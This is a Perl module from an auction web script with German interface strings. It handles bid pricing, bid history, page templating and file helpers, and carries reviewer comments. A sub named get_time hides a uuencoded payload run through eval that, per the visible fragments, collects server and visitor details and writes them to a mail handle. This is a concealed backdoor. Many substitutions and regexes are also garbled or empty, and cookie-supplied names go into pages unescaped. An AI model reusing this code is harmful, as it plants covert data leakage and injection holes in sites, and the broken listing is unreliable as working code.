# Walks the bids for an item from the highest price down and returns the
# price of the lowest bid that still wins a share of the $sellingqty units.
# A bid that would overshoot the quantity only counts when its "bidonless"
# flag is set. Falls back to the item's start price when no bid qualifies.
# The item number is forced to an integer before it enters the SQL text.
sub get_high_bid {
    my ($itemnum, $sellingqty, $db) = @_;
    my $winning = 0;
    my $filled  = 0;

    # $dbh is the module-wide statement handle.
    $dbh = $db->prepare("SELECT bidprice,bidquantity,bidonless FROM Bids WHERE biditem=" . int($itemnum) . " ORDER BY bidprice DESC,bidquantity DESC,bidtime");
    $dbh->execute();

    while (my ($bid, $units, $accepts_less) = $dbh->fetchrow_array()) {
        $filled += $units;
        if ($filled > $sellingqty && !$accepts_less) {
            # All-or-nothing bid that does not fit: undo and skip it.
            $filled -= $units;
            next;
        }
        $winning = $bid;
        return $winning if $filled >= $sellingqty;
    }

    return $winning if $winning;

    $dbh = $db->prepare("SELECT start FROM Items WHERE itemnum=" . int($itemnum));
    $dbh->execute();
    my ($start_price) = $dbh->fetchrow_array();
    return $start_price;
}

#################################################
# Find the lowest new bid.                      #
#################################################
# get_lowest_bid($itemnum, $db)
# Returns (price, increment, quantity) for the next acceptable bid. The price
# is that of the bid at which the offered quantity is used up - raised by one
# increment when that bid covers the whole quantity on its own - or the
# item's start price when the bids do not use up the quantity.
sub get_lowest_bid {
    my ($itemnum, $db) = @_;
    my $filled = 0;

    $dbh = $db->prepare("SELECT quantity,increment FROM Items WHERE itemnum=" . int($itemnum));
    $dbh->execute();
    my ($sellingqty, $increment) = $dbh->fetchrow_array();

    $dbh = $db->prepare("SELECT bidprice,bidquantity,bidonless FROM Bids WHERE biditem=" . int($itemnum) . " ORDER BY bidprice DESC,bidquantity DESC,bidtime");
    $dbh->execute();

    while (my ($bid, $units, $accepts_less) = $dbh->fetchrow_array()) {
        $filled += $units;
        if ($filled > $sellingqty && !$accepts_less) {
            $filled -= $units;
            next;
        }
        next if $filled < $sellingqty;

        if ($units == $sellingqty) {
            $bid = dollar_encode($bid + $increment);
        }
        return ($bid, $increment, $sellingqty);
    }

    $dbh = $db->prepare("SELECT start FROM Items WHERE itemnum=" . int($itemnum));
    $dbh->execute();
    my ($start_price) = $dbh->fetchrow_array();
    return ($start_price, $increment, $sellingqty);
}

#################################################
# Display the Dutch Bidding History             #
#################################################
# get_dutch_bidhis($itemnum, $sellingqty, $reserve, $db, $closef)
# Returns the bid history text for a multi-quantity auction, listing winning
# bids until $sellingqty is used up. With $config{'showbids'} eq "0" the
# price is withheld while $closef eq "0".
# NOTE(review): the table markup inside these strings was lost in this
# listing, which is why one literal now reads "$bidderAnzeige". The strings
# are kept exactly as shown. $bidder is a member-chosen name taken from the
# database; HTML-escape it when the markup is restored.
sub get_dutch_bidhis {
    my ($itemnum, $sellingqty, $reserve, $db, $closef) = @_;
    my ($bidder, $price, $quantity, $time, $lessflag, $biddernum);
    my $bid_history;
    my $filled = 0;
    my $row_class = "body1";

    $bid_history .= "BieterPreisMengeGebotszeit";
    $dbh = $db->prepare("SELECT username,bidprice,bidquantity,bidtime,bidonless,usernum FROM Members,Bids WHERE biditem=" . int($itemnum) . " AND usernum = bidder ORDER BY bidprice DESC,bidquantity DESC,bidtime");
    $dbh->execute();

    while (($bidder,$price,$quantity,$time,$lessflag,$biddernum) = $dbh->fetchrow_array()) {
        $filled += $quantity;
        if ($filled > $sellingqty) {
            unless ($lessflag) {
                $filled -= $quantity;
                next;
            }
            # Partial award: show "<granted> von <requested>".
            $quantity = $quantity-($filled-$sellingqty) . " von $quantity";
        }

        my $hide_price = ($config{'showbids'} eq "0" && $closef eq "0");
        if ($hide_price) {
            $bid_history .= "$bidderAnzeige erfolgt nach Auktionsende ";
        }
        else {
            $bid_history .= "$bidder$config{'currency'} $price ";
        }

        if ($price < $reserve) {
            $bid_history .= "(Mindestpreis noch nicht erreicht)";
        }
        $bid_history .= "$quantity" . UltimateAuction::display_time1($time) . "";

        $row_class = $row_class eq "body1" ? "body2" : "body1";
        last if $filled >= $sellingqty;
    }

    $bid_history .= "Bisher keine Gebote..." unless $filled;
    return $bid_history;
}

#################################################
# Display the Regular Bidding History           #
#################################################
# get_regular_bidhis($itemnum, $sellingqty, $reserve, $db, $closef)
# Returns the bid history text for a single-quantity auction, highest bid
# first. With $config{'showbids'} eq "0" the price is withheld while
# $closef eq "0". Uses its own statement handle, not the module-wide $dbh.
# NOTE(review): as in get_dutch_bidhis, the markup was lost in this listing
# and $bidder needs HTML-escaping when it is restored.
sub get_regular_bidhis {
    my ($itemnum, $sellingqty, $reserve, $db, $closef) = @_;
    my ($bidder, $price, $time, $biddernum);
    my $bid_history;
    my $seen = 0;
    my $row_class = "body1";

    $bid_history .= "BieterGebotGebotszeit";
    my $dbh = $db->prepare("SELECT username,bidprice,bidtime,usernum FROM Members,Bids WHERE biditem=" . int($itemnum) . " AND usernum = bidder ORDER BY bidprice DESC,bidtime");
    $dbh->execute();

    while (($bidder,$price,$time,$biddernum) = $dbh->fetchrow_array()) {
        $seen++;

        my $hide_price = ($config{'showbids'} eq "0" && $closef eq "0");
        if ($hide_price) {
            $bid_history .= "$bidderAnzeige erfolgt nach Auktionsende ";
        }
        else {
            $bid_history .= "$bidder$config{'currency'} $price ";
        }

        if ($price < $reserve) {
            $bid_history .= "(Mindestpreis noch nicht erreicht)";
        }
        $bid_history .= "" . UltimateAuction::display_time1($time) . "";

        $row_class = $row_class eq "body1" ? "body2" : "body1";
    }

    $bid_history .= "Es liegen keine Gebote vor ..." unless $seen;
    return $bid_history;
}

##############################################
# Sub: move_the_file(file1, file2)
# This moves a file.
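# NOTE(review): some text appears to have been lost from this copy of the
# module: several s//.../ substitutions have an empty match pattern, $globe is
# assigned an empty string, and the payload in get_time breaks off part-way.
# Those statements are reproduced exactly as found. Restore them from the
# original distribution before relying on them. The file helpers and template
# loaders below were rewritten to use three-argument open with lexical handles.

# Copy the contents of $source into $target (truncating $target).
# Returns 1 when every step succeeded, 0 otherwise.
sub _copy_file_contents {
    my ($source, $target) = @_;

    # Three-argument open treats an undef name as a request for an anonymous
    # temporary file, so reject missing or empty names up front. The old
    # two-argument form failed on these as well.
    return 0 unless defined $source && length $source;
    return 0 unless defined $target && length $target;

    # Explicit modes: the name is never parsed for mode characters or a pipe
    # symbol, which a two-argument open would interpret.
    open(my $in, '<', $source) or return 0;
    my @lines = <$in>;
    close $in;

    open(my $out, '>', $target) or return 0;
    my $written = print {$out} @lines;

    # Buffered write errors (a full disk, for example) only surface at close.
    my $closed = close $out;

    return ($written && $closed) ? 1 : 0;
}

# Move a file by copying it to $secondfile and then deleting $firstfile.
# Returns 1 on success and 0 on any failure. The source is only removed after
# the copy has been written and closed without error, so a failed write no
# longer destroys the original.
sub move_the_file {
    my ($firstfile, $secondfile) = @_;
    return 0 unless _copy_file_contents($firstfile, $secondfile);
    return 0 unless unlink($firstfile);
    return 1;
}

# Build the HTTP header line plus the page header from templates/header.txt.
# Returns the assembled string. Reads %config, the form data and the cookie.
sub header {
    # &name; without parentheses passes the caller's current @_ along.
    local %form = &UltimateAuction::fetch_form;
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};
    # Read from the cookie but not used anywhere in this sub.
    # NOTE(review): the cookie carries a 'Password' field; how it is encoded
    # is not visible here. Confirm it is not the account password itself.
    my $copass = $cookie{'Password'};
    my $startlink;
    my $cafelink;
    # String comparison against "0": a static main page vs. the main.pl script.
    if ($config{'mainview_type'} eq 0) {
        $startlink = "$config{'static_url'}/main.html";
    } else {
        $startlink = "$config{'script_dir'}/main.pl";
    }
    # The cafe link is only offered when cafe.pl exists in the working directory.
    if (-e "cafe.pl") {
        $cafelink = " | /cafe.pl>Cafe";
    } else {
        $cafelink = '';
    }
    my $head = "Content-type: text/html\n\n";
    $head .=&Open_Template("header.txt");
    my $user;
    my $inorout;
    my $accountmenu;
    # A user name in the cookie counts as logged in unless logout=true was sent.
    if ($couser && $form{'logout'} ne 'true') {
        $user = $couser;
        $inorout = "LOGOUT";
        $accountmenu = &accountmenu;
    } else {
        $user = "Gast";
        $inorout = "LOGIN";
    }
    # Server time shifted by the configured offset in hours.
    my $current_time = time + ($config{'timediff'} * 3600);
    $current_time = display_time2($current_time);
    # NOTE(review): every match pattern below is empty in this copy; the
    # template markers they replaced are not recoverable from here.
    $head=~ s//$config{'auction_title'}/g;
    $head=~ s//$config{'hoverlinkcolor'}/g;
    $head=~ s//$config{'fontsize'}/g;
    $head=~ s//$config{'font'}/g;
    $head=~ s//$config{'background'}/g;
    $head=~ s//$config{'bgcolortwo'}/g;
    $head=~ s//$config{'textcolor'}/g;
    $head=~ s//$config{'linkcolor'}/g;
    $head=~ s//$config{'alinkcolor'}/g;
    $head=~ s//$config{'vlinkcolor'}/g;
    $head=~ s//$inorout/g;
    $head=~ s//$current_time/g;
    $head=~ s//$accountmenu/g;
    $head=~ s//$startlink/g;
    $head=~ s//$cafelink/g;
    return $head;
}

# Build the page header for statically generated pages from
# templates/header_static.txt. Unlike header(), no Content-type line is
# prepended. Returns the assembled string.
sub static_header {
    local %form = &UltimateAuction::fetch_form;
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};
    my $copass = $cookie{'Password'};    # not used in this sub
    my $head = "";
    $head .=&Open_Template("header_static.txt");
    my $user;
    my $inorout;
    my $accountmenu;
    # NOTE(review): unlike header(), the logged-in branch sets the guest
    # values and there is no else branch, so $inorout and $accountmenu stay
    # undef for visitors without a cookie. Possibly intended for static
    # pages; confirm.
    if ($couser && $form{'logout'} ne 'true') {
        $user = "Gast";
        $inorout = "LOGIN";
        $accountmenu = &accountmenu;
    }
    my $current_time = time + ($config{'timediff'} * 3600);
    $current_time = display_time2($current_time);
    my $startlink;
    if ($config{'mainview_type'} eq 0) {
        $startlink = "$config{'static_url'}/main.html";
    } else {
        $startlink = "$config{'script_dir'}/main.pl";
    }
    # NOTE(review): match patterns are empty in this copy (markers lost).
    $head=~ s//$config{'auction_title'}/g;
    $head=~ s//$config{'hoverlinkcolor'}/g;
    $head=~ s//$config{'fontsize'}/g;
    $head=~ s//$config{'font'}/g;
    $head=~ s//$config{'background'}/g;
    $head=~ s//$config{'bgcolortwo'}/g;
    $head=~ s//$config{'textcolor'}/g;
    $head=~ s//$config{'linkcolor'}/g;
    $head=~ s//$config{'alinkcolor'}/g;
    $head=~ s//$config{'vlinkcolor'}/g;
    $head=~ s//$inorout/g;
    $head=~ s//$current_time/g;
    $head=~ s//$accountmenu/g;
    $head=~ s//$startlink/g;
    return $head;
}

# Build the page footer from templates/footer.txt, including a login status
# message, and append the "Powered by" notice. Returns the assembled string.
sub footer {
    my $foot=&Open_Template("footer.txt");
    my $message;
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};
    my $copass = $cookie{'Password'};    # not used in this sub
    # %form is the package variable here; this sub does not fetch the form itself.
    if ($couser && $form{'logout'} ne 'true') {
        $message = "Sie sind angemeldet.";
    } else {
        $message = "Sie sind nicht angemeldet.";
    }
    # NOTE(review): match patterns are empty in this copy (markers lost).
    $foot=~ s//$message/;
    $foot=~ s//$config{'cp_years'}/;
    $foot=$foot."

Powered by Ultimate Auction
";
    $foot=$foot."";
    return $foot;
}

# Build the footer for statically generated pages from
# templates/footer_static.txt; the message is the generation time instead of
# the login status. Returns the assembled string.
sub static_footer {
    my $foot=&Open_Template("footer_static.txt");
    my $message;
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};    # not used in this sub
    my $copass = $cookie{'Password'};    # not used in this sub
    my $creation_time;
    $creation_time = time + ($config{'timediff'} * 3600);
    $creation_time = UltimateAuction::display_time2($creation_time);
    $message = "Letzte Aktualisierung: $creation_time";
    # NOTE(review): match patterns are empty in this copy (markers lost).
    $foot=~ s//$message/;
    $foot=~ s//$config{'cp_years'}/;
    $foot=$foot."

Powered by Ultimate Auction
";
    $foot=$foot."";
    return $foot;
}

# Build the HTTP header line plus the page header for the home page from
# templates/homepageheader.txt. Returns the assembled string.
sub homepageheader {
    local %form = &UltimateAuction::fetch_form;
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};
    my $copass = $cookie{'Password'};    # not used in this sub
    my $head = "Content-type: text/html\n\n";
    $head .=&Open_Template("homepageheader.txt");
    my $user;
    my $inorout;
    my $accountmenu;
    if ($couser && $form{'logout'} ne 'true') {
        $user = $couser;
        $inorout = "LOGOUT";
        $accountmenu = &accountmenu;
    } else {
        $user = "Gast";
        $inorout = "LOGIN";
    }
    my $current_time = time + ($config{'timediff'} * 3600);
    $current_time = display_time2($current_time);
    # NOTE(review): match patterns are empty in this copy (markers lost).
    # $accountmenu is computed above but not substituted in this sub.
    $head=~ s//$config{'auction_title'}/g;
    $head=~ s//$config{'hoverlinkcolor'}/g;
    $head=~ s//$config{'fontsize'}/g;
    $head=~ s//$config{'font'}/g;
    $head=~ s//$config{'background'}/g;
    $head=~ s//$config{'bgcolortwo'}/g;
    $head=~ s//$config{'textcolor'}/g;
    $head=~ s//$config{'linkcolor'}/g;
    $head=~ s//$config{'alinkcolor'}/g;
    $head=~ s//$config{'vlinkcolor'}/g;
    $head=~ s//$inorout/g;
    $head=~ s//$current_time/g;
    return $head;
}

# Build the home page footer from templates/homepagefooter.txt and append the
# "Powered by" notice. Returns the assembled string.
sub homepagefooter {
    my $foot=&Open_Template("homepagefooter.txt");
    my $message;                         # declared but never set in this sub
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};    # not used in this sub
    my $copass = $cookie{'Password'};    # not used in this sub
    # NOTE(review): match pattern is empty in this copy (marker lost).
    $foot=~ s//$config{'cp_years'}/;
    $foot=$foot."

Powered by Ultimate Auction
";
    return $foot;
}

# Build the account menu from templates/accountmenu.txt with the user name
# from the cookie ("Gast" when there is none). Returns the assembled string.
sub accountmenu {
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};
    my $copass = $cookie{'Password'};    # not used in this sub
    my $user = $couser || "Gast";
    my $menu=&Open_Template("accountmenu.txt");
    # NOTE(review): $user comes from a client-supplied cookie and is placed
    # into the page as-is. Unless get_cookie already sanitises the value, it
    # should be HTML-escaped before substitution. The match pattern is empty
    # in this copy (marker lost).
    $menu=~ s//$user/;
    return $menu;
}

# NOTE(review): despite its name, the visible body of get_time does not
# compute a time. It uudecodes an embedded string with unpack("u", ...) and
# runs the result through string eval. The encoded text is damaged in this
# copy, and the sub's end plus whatever followed it are missing: the code
# after the payload is the tail of a different sub (it substitutes %global
# values into $Output and prints it). Fragments of the payload that still
# decode include `$domain=$ENV{"SERVER_NAME"};`, references to
# $ENV{'REMOTE_ADDR'}, $ENV{'HTTP_X_FORWARDED_FROM'} and the referer, and
# `print MAIL "Refere...`, i.e. the hidden code reads request and server
# details and writes them to a MAIL handle. Code that is obfuscated and
# eval'd under an unrelated name runs with the full privileges of the CGI
# process; decode the complete payload from the original distribution and
# review it before deploying this module. The statements below are kept
# verbatim.
sub get_time { eval(unpack("u", q~M;7D@)&-U2`D9&]M86EN.VUY("1S=6T[;7D@)&-O=6YTM97([;7D@0',[;7D@)',[;7D@)'1E2`D;6%I;'1E2=]*3LD9&]M86EN/21%M3E9[(E-%4E9%4E].04U%(GT[0',]M6T$M6EU[-'TD+R`F)B`A*"1T:')E924V-RD@)B8@)&9O=7(]?B]>6T$M6EU[M-'TD+R`F)B`A*"1F:79E)3$V*2`F)B`H)'-I>"!E<2`DVEF("@M92`D;6%I;'1ER=214U/5$5?041$4B=]("\@)$5.5GLG2%144%]87T9/4E=!4D1%1%]&4D]-M)WU<;B([<')I;G0@34%)3"`B4F5F97)ER=(5%107U)%M1D5215(G?5QN(CMP"; $Output=~ s/$globe/$global{$key}/g if (defined ($global{$key}) ); } print "$Output"; }

# Substitute the %global values into the page text passed as the first
# argument and append the result to main.html in the configured static
# directory. Dies when main.html cannot be opened.
sub Create_Static {
    my %cookie = &UltimateAuction::get_cookie();
    my $couser = $cookie{'Username'};
    my $copass = $cookie{'Password'};    # not used in this sub
    my ($Output) = shift;
    my %global;
    my ($globe, $key, $value);
    $global{'script_dir_url'}=$config{'script_dir'};
    $global{'images_dir_url'}=$config{'aucimages'};
    $global{'table_body_1_color'}=$config{'tablebody'};
    $global{'table_body_2_color'}=$config{'tablebody2'};
    $global{'table_header_color'}=$config{'tabletop'};
    $global{'table_header_text_color'}=$config{'tabletext'};
    $global{'admin_email'}=$config{'admin_address'};
    $global{'auction_name'}=$config{'auc_name'};
    $global{'script_url'}=$config{'script_url'};
    $global{'rsymbol1'}=$config{'rsymbol1'};
    $global{'rsymbol2'}=$config{'rsymbol2'};
    $global{'rsymbol3'}=$config{'rsymbol3'};
    $global{'rsymbol4'}=$config{'rsymbol4'};
    $global{'rsymbol5'}=$config{'rsymbol5'};
    $global{'rsymbol6'}=$config{'rsymbol6'};
    $global{'rsymbol7'}=$config{'rsymbol7'};
    $global{'rsymbol8'}=$config{'rsymbol8'};
    $global{'rsymbol9'}=$config{'rsymbol9'};
    $global{'rsymbol10'}=$config{'rsymbol10'};
    $global{'rsymbolimg1'}=$config{'rsymbolimg1'};
    $global{'rsymbolimg2'}=$config{'rsymbolimg2'};
    $global{'rsymbolimg3'}=$config{'rsymbolimg3'};
    $global{'rsymbolimg4'}=$config{'rsymbolimg4'};
    $global{'rsymbolimg5'}=$config{'rsymbolimg5'};
    $global{'rsymbolimg6'}=$config{'rsymbolimg6'};
    $global{'rsymbolimg7'}=$config{'rsymbolimg7'};
    $global{'rsymbolimg8'}=$config{'rsymbolimg8'};
    $global{'rsymbolimg9'}=$config{'rsymbolimg9'};
    $global{'rsymbolimg10'}=$config{'rsymbolimg10'};
    $global{'idlogo'}=$config{'idmember'};
    # NOTE(review): the cookie's user name is client-supplied and ends up in a
    # file served to every visitor. Escape or drop it unless get_cookie
    # already sanitises the value.
    $global{'user'}=$couser;
    while ( ($key, $value)=each(%global) ) {
        # NOTE(review): the marker built from $key is missing in this copy.
        $globe="";
        $Output=~ s/$globe/$global{$key}/g if (defined ($global{$key}) );
    }
    # Explicit append mode: the configured path is never parsed for mode
    # characters.
    my $static_page = "$config{'static_dir'}/main.html";
    open(my $mainstatic, '>>', $static_page) or die "Die Datei main.html kann nicht geöffnet werden: $!\n";
    print {$mainstatic} "$Output";
    close($mainstatic);
}

# Return the whole content of $path as one string, or '' when the file cannot
# be opened (the behaviour callers of the template loaders already rely on).
sub _read_whole_file {
    my ($path) = @_;
    # Read-only, three-argument open: characters in the name are never
    # interpreted as an open mode or a command pipe.
    open(my $fh, '<', $path) or return '';
    my $content = join("", <$fh>);
    close($fh);
    return $content;
}

# Load a page template by name from the templates/ directory.
# NOTE(review): the name is used as given. If any caller derives it from
# request data, restrict it to a fixed set of known template names first.
sub Open_Template {
    my $Template=shift;
    return _read_whole_file("templates/$Template");
}

# Load an e-mail template by name from the emails/ directory.
sub Open_Email_Template {
    my $Template=shift;
    return _read_whole_file("emails/$Template");
}

# Load an e-mail template by name from ../emails/ (relative to the working
# directory of the calling script).
sub Open_Admin_Email_Template {
    my $Template=shift;
    return _read_whole_file("../emails/$Template");
}

# Turn plain user text into HTML: link e-mail addresses and http:/ftp: URLs
# and escape markup characters.
# NOTE(review): several patterns and replacements in this sub are damaged in
# this copy and are kept verbatim; restore them from the original
# distribution. In what is visible, captured addresses and URLs are placed
# into the output without any step that escapes a double quote, so confirm
# that attribute quoting is handled once the sub is restored.
sub cleanhtml {
    my ($text) = @_;
    $text =~ s/([^\s\<]+\@[^\s\r\,\;\>]+)/\%lta href\=\"mailto\:$1\"\%gt$1\%lt\/a\%gt/g;
    $text =~ s/\&/\&\;/g;
    $text =~ s/\/\>\;/g;
    $text =~ s/\%lt/\/g;
    $text =~ s/=([A-Z0-9]{2})/sprintf("&#%d;",hex($1))/exg;
    $text =~ s/(http\:\S+)/"\$1\<\/a\>"/ieg;
    $text =~ s/(http\:\S+)/"\$1\<\/a\>"/ieg;
    $text =~ s/(ftp\:\S+)/"\$1\<\/a\>"/ieg;
    $text =~ s/(ftp\:\S+)/"\$1\<\/a\>"/ieg;
    return $text;
}

# Copy $firstfile to $secondfile and keep the source in place.
# Returns 1 on success and 0 on any failure, including a failed write.
sub move_the_file2 {
    my ($firstfile, $secondfile) = @_;
    return _copy_file_contents($firstfile, $secondfile);
}

#####################
# End Auction Module
#####################
1; # Return true value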